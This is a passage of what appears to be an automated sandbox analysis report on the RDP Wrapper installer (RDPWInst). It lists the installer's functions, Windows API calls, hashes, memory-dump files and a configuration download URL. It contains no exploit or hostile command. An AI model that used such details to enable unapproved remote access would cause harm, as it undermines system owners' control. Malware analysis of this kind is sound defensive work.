                                                    • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                    • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                    • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                    Function 00414634 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                    • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCompareExchangeHandleInterlocked
                                                    • String ID:
                                                    • API String ID: 190309047-0
                                                    • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                    • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                    • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                    • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                    Function 00438860 Relevance: 3.0, APIs: 2, Instructions: 19registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                    • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFlush
                                                    • String ID:
                                                    • API String ID: 320916635-0
                                                    • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                    • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                    • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                    • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                    Function 00438B08 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                    • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                    • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                    • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                    Function 004083B0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                      • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                      • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 4113206344-0
                                                    • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                    • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                    • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                    • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                    Function 0040F650 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                    • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                    • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                    • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                    Function 0040F6C0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                    • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                    • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                    • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                    Function 0043A644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1721193555-0
                                                    • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                    • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                    • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                    • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                    Function 0040F7C4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                    • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                    • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                    • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                    Function 0040FB5C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDirectory
                                                    • String ID:
                                                    • API String ID: 4241100979-0
                                                    • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                    • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                    • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                    • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                    Function 00409310 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn
                                                    • String ID:
                                                    • API String ID: 97706510-0
                                                    • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                    • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                    • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                    • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                    Function 00402AB2 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$Free$Query
                                                    • String ID:
                                                    • API String ID: 778034434-0
                                                    • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                    • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                    • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                    • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A

                                                    Non-executed Functions

                                                    Function 0043CF60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 70networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                    • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$Open$FileRead
                                                    • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                    • API String ID: 4294395943-3115740878
                                                    • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                    • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                    • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                    • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                    Function 00408EB9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                    • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                    • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                    • String ID: \
                                                    • API String ID: 426534248-2967466578
                                                    • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                    • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                    • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                    • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                    Function 00408908 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$Info$Valid
                                                    • String ID:
                                                    • API String ID: 1826331170-0
                                                    • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                    • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                    • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                    • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                    Function 00414698 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                    Strings
                                                    Memory Dump Source
